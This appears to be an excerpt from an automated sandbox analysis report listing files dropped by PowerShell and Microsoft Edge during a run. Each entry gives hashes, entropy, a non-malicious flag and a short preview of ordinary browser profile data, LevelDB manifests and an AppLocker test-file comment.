                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:JSON data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1371
                                                                                                            Entropy (8bit):5.5772966690225365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:YpQBqDPak7u5rrtmP8Iof3Xjomz0z/ayik/JJdXBuBuwBRap0NhFIJX/EYQoTEtw:YuBqDPafkkIe3ToMvkpgBzBRfFIJPE9s
                                                                                                            MD5:B5CB8D732BCBCCE72B1118F726076E69
                                                                                                            SHA1:1804C0271EE7C14D5B1E5ACDD351812F7A81D5A2
                                                                                                            SHA-256:7903CBBDFC9131AFA23B835BF27DD6BD220A32BA865A3F515B6E93092DA2D32A
                                                                                                            SHA-512:2A1D85B353095852DE2B360309C7E5340F589B7477C7392EAF935A16645C4746ADF5241CBB9E9125D8137506D4706506E3E9573E823B68659EC632F6F512B08B
                                                                                                            Malicious:false
                                                                                                            Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAD5MRYvJzSqT7x0qUazdvVMEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADTfxqgd9n8PJe8GwAfHKHdZgXyLkb5j87vz07w/y+v7AAAAAAOgAAAAAIAACAAAADAa44vTND0cWkZqLZXJKyMKZ7xECoL3XV6wbgYeGH1sTAAAABTdBSMmBCXah60tTx/hJNLulT9b8+o7FsdxfakKIl505QQ89KYkrrXcHWXdL3J8qpAAAAA5KsId0qjGyXc6+aeXDVR9+/JGLprO2WYTQhUa22U9FUEYORZYnhIY2BosQffSdV3NhHQKCXJPzUEkS7QaGPeEg=="},"profile":{"info_cache":{},"profile_counts_reported":"13377865185483849","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1733391585"},"user_experienc
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4194304
                                                                                                            Entropy (8bit):0.221388210987991
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:Nm5OD+DrK0RpkG4dHRGlFj9yRGg1DRFFJquRGJ317xzVL20I:NmQDorK0sG4ulFj97g1HFJqHp3zV
                                                                                                            MD5:EC88C2ED68444BCCB0EFB9D39B0266C7
                                                                                                            SHA1:F725482479809B464BA4F5141AF3175441E66495
                                                                                                            SHA-256:40E3E6133212A540B0309A79B3BB8B0563611E3C800FEE84A68A1CC1B981E495
                                                                                                            SHA-512:E81666159FA5A69A25D009168BE786CA02D2809C0A6F855F4B8AF124F4305948A69F77D6ED84696683EDA302F5827B477F91EBB5A1A4AC65A08055D56ABDA13F
                                                                                                            Malicious:false
                                                                                                            Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q..........117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".jaxfcm20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@......................................<.w..U..d.y.oK.>.........."....."...2...".*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...sh..|OO@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered...
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):280
                                                                                                            Entropy (8bit):1.7498334415725745
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:FiWWltlw4rltl/fN9/2gHoim+c//:o1wAF
                                                                                                            MD5:27BFAC5071781DA84FA54787EA930946
                                                                                                            SHA1:C33A1A2EF83CEDA4C5A1D8F960DC0D49FBBA79BB
                                                                                                            SHA-256:E08E74BA7FD2E34E36840419479A3C1A9E5A82CDEB011C7382FEAAE6448CB699
                                                                                                            SHA-512:44FE7B24EA49E3A6D62F9F14EE098E47B4B63A252B28E47C81B09904ADE0342188ED9937F96A26618832A20E8E93C8F055F787D31075907CC36B1D605CB4E9AE
                                                                                                            Malicious:false
                                                                                                            Preview:sdPC....................."..>..O...P\B................................................................................................................................................................................................65cb5c1e-1b69-4b09-8918-03c13bf018c8............
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20
                                                                                                            Entropy (8bit):3.6219280948873624
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:8g6Vvn:8g6Vv
                                                                                                            MD5:9E4E94633B73F4A7680240A0FFD6CD2C
                                                                                                            SHA1:E68E02453CE22736169A56FDB59043D33668368F
                                                                                                            SHA-256:41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
                                                                                                            SHA-512:193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
                                                                                                            Malicious:false
                                                                                                            Preview:level=none expiry=0.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:dBase III DBT, next free block index 3238316739, block length 1024
                                                                                                            Category:dropped
                                                                                                            Size (bytes):45056
                                                                                                            Entropy (8bit):0.029022790963769942
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:/F3XGui145lll1ikeF+Z09i+lll1iETWvvR+X:d3XRlvHeQZallvnc
                                                                                                            MD5:0BAD1B95837BC27F617707F9A70ADB39
                                                                                                            SHA1:240E9853A39AE016317019DFF71F1A7A87CBB3F7
                                                                                                            SHA-256:5C4703AEBB358EBC1A50A582B2CCDA1CDA218129012436D0962115355E359DC5
                                                                                                            SHA-512:2138BE00C4412A73558E76D0A982DEE6BAF6626AA8C4CFA78EA4D167EB1C6920D59ECE21AE4E0156E0E89CDCDB627378ED73E4549CA56709B13D133457616796
                                                                                                            Malicious:false
                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):270336
                                                                                                            Entropy (8bit):0.04395150106207501
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:U/MmXXclTpLpg6L09RjTwYklHJ9LspLpg6LASrJqknMYPqwcdCIRrYfhbtZPC93z:Jmnq0olf0A2qkn7PId/Rc1PCQHjTpM
                                                                                                            MD5:ADF8A38A397F4BDA301E167CB784B6A0
                                                                                                            SHA1:66FD46529ABD8F1957C882A3553F884419EBD60A
                                                                                                            SHA-256:5C64F73CB6F322C07F8C133265232BF734AE186ACC48478AC7686C468FAF038E
                                                                                                            SHA-512:BF2AC0B708B4DBD18523A899ADEAEAEE77A79886BEB52B60D13CD3217A9395B8B7FD71EA06CF38070A7582292357F0E7329A95F4F48F87CA4B9F85A063C76CDA
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):524656
                                                                                                            Entropy (8bit):5.027445846313988E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:LsulqxDll:LsJhll
                                                                                                            MD5:C8B67803CFBB3835FC2E8F9C2B39FA6B
                                                                                                            SHA1:F782036240047548A1A4E62A994590FE760B2C6B
                                                                                                            SHA-256:DE5A95F1972C918CE5DFA569042273BB7E787D37A297FC19E097250D0390248D
                                                                                                            SHA-512:6F4AB92407421A367680EB8D0B3E4DB55DC29A2C893097DA1473065A481FEE6F6B9A071FFF68B20DD19328FB44E67BDEC035F5FCC7C99CE6035E6130C7420610
                                                                                                            Malicious:false
                                                                                                            Preview:..........................................S.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:m+l:m
                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                            Malicious:false
                                                                                                            Preview:0\r..m..................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):48
                                                                                                            Entropy (8bit):2.8981641637663254
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:4WwTEYkuLn:4WwgIL
                                                                                                            MD5:84850072B3603A103F49D31E02C5CC87
                                                                                                            SHA1:6B99C24E10CD664BBBFE6973D850024B317CD4F3
                                                                                                            SHA-256:4DE488D3571CD8254A6F514E777DAFC952B9A642255FCDD8018C021F722B4519
                                                                                                            SHA-512:382322FC5B3459FA110C1A7F6275D75CE018E602C8C0DCB8B5856FAFBBC9B987C42233CACCDF46DBCFAA17EC9D6AFE7750648ABD87FF874B7140CD3BC69C2519
                                                                                                            Malicious:false
                                                                                                            Preview:(...e!..oy retne..........................I.../.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):48
                                                                                                            Entropy (8bit):2.8981641637663254
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:4WwTEYkuLn:4WwgIL
                                                                                                            MD5:84850072B3603A103F49D31E02C5CC87
                                                                                                            SHA1:6B99C24E10CD664BBBFE6973D850024B317CD4F3
                                                                                                            SHA-256:4DE488D3571CD8254A6F514E777DAFC952B9A642255FCDD8018C021F722B4519
                                                                                                            SHA-512:382322FC5B3459FA110C1A7F6275D75CE018E602C8C0DCB8B5856FAFBBC9B987C42233CACCDF46DBCFAA17EC9D6AFE7750648ABD87FF874B7140CD3BC69C2519
                                                                                                            Malicious:false
                                                                                                            Preview:(...e!..oy retne..........................I.../.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):24
                                                                                                            Entropy (8bit):2.1431558784658327
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:m+l:m
                                                                                                            MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                            SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                            SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                            SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                            Malicious:false
                                                                                                            Preview:0\r..m..................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):48
                                                                                                            Entropy (8bit):2.955557653394731
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:6VE0ElouLn:6alouL
                                                                                                            MD5:F03FBB415FCB34F14DE6FF2E182B8232
                                                                                                            SHA1:8FA4CAFB16D9AF2F68D253BE115584316304844D
                                                                                                            SHA-256:FC7A163CD2C5C1BF6082B273F7690E0CDE003A1743A0947F952FCCDACB625ECF
                                                                                                            SHA-512:6C3226275BBE3BD438F0DACE140D92BE98CB4014AF5ED68EFE7E377076A1ED348ED5EC9117CC8F4C00B464FF4D8B646C079565C1ED1605784CE8F5F21FC3B9FD
                                                                                                            Malicious:false
                                                                                                            Preview:(...g..-oy retne........................y.I.../.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):48
                                                                                                            Entropy (8bit):2.955557653394731
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:6VE0ElouLn:6alouL
                                                                                                            MD5:F03FBB415FCB34F14DE6FF2E182B8232
                                                                                                            SHA1:8FA4CAFB16D9AF2F68D253BE115584316304844D
                                                                                                            SHA-256:FC7A163CD2C5C1BF6082B273F7690E0CDE003A1743A0947F952FCCDACB625ECF
                                                                                                            SHA-512:6C3226275BBE3BD438F0DACE140D92BE98CB4014AF5ED68EFE7E377076A1ED348ED5EC9117CC8F4C00B464FF4D8B646C079565C1ED1605784CE8F5F21FC3B9FD
                                                                                                            Malicious:false
                                                                                                            Preview:(...g..-oy retne........................y.I.../.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.01057775872642915
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsFl:/F
                                                                                                            MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                            SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                            SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                            SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                            Malicious:false
                                                                                                            Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):270336
                                                                                                            Entropy (8bit):8.280239615765425E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                            MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                            SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                            SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                            SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.011852361981932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsHlDll:/H
                                                                                                            MD5:0962291D6D367570BEE5454721C17E11
                                                                                                            SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                            SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                            SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.012340643231932763
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:MsGl3ll:/y
                                                                                                            MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                            SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                            SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                            SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):262512
                                                                                                            Entropy (8bit):9.553120663130604E-4
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:LsNlGptll:Ls3All
                                                                                                            MD5:18B4FCF4C4ABD052100CDDD730F2DBE0
                                                                                                            SHA1:EF623CF9A49A2228ABB21F682B946A7B7327CD2B
                                                                                                            SHA-256:BB1F3B214C6F7DEAB1B447AE552EC2A7CED5C87DB202F31F32900347B5AF1A35
                                                                                                            SHA-512:0C1F9FA3D2B8000886B20063B0D1AC50D7E120586BE6E42637EE9039CE1851372FF6DE20DB87AD0BB518F21807F1D20C04B2D3460E78105CB870EDD6137B2FB7
                                                                                                            Malicious:false
                                                                                                            Preview:..........................................S.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33
                                                                                                            Entropy (8bit):3.5394429593752084
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                            MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                            SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                            SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                            SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                            Malicious:false
                                                                                                            Preview:...m.................DB_VERSION.1
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):295
                                                                                                            Entropy (8bit):5.276385054246707
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Y1ZM1N723fQsG2tbB2KLla1YOVq2PN723fQsG2tMsIFUv:Yjsa59VFLQyOVvVa59GFUv
                                                                                                            MD5:C578863D8CB835D9FE25B7E42E90A6B0
                                                                                                            SHA1:3C13682BD46721480BD39C26A0309D6EC055FC0D
                                                                                                            SHA-256:967DE7EE9E99FE194821683359215C9188A5FCBC8DF1D1BAB11B1D98C774F6EB
                                                                                                            SHA-512:01372CA5E5EF6D877450D74DB2978E069B7BA9758D2B17FCB7BA41FEABFA5E3A08A20CDA2CE1827610ACA6190D2F9812CE1413DBBB1F51681D880FC3A00A1B4D
                                                                                                            Malicious:false
                                                                                                            Preview:2024/12/05-04:39:46.101 16d4 Creating DB C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\EdgeCoupons/coupons_data.db since it was missing..2024/12/05-04:39:46.127 16d4 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6EA4.tmp\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:OpenPGP Secret Key
                                                                                                            Category:dropped
                                                                                                            Size (bytes):41
                                                                                                            Entropy (8bit):4.704993772857998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                            Malicious:false
                                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16
                                                                                                            Entropy (8bit):3.2743974703476995
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                            Malicious:false
                                                                                                            Preview:MANIFEST-000001.
                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):171
                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
                                                                                                            MD5:E952942B492DB39A75DD2669B98EBE74
                                                                                                            SHA1:F6C4DEF325DCA0DFEC01759D7D8610837A370176
                                                                                                            SHA-256:14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
                                                                                                            SHA-512:9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
                                                                                                            Malicious:false
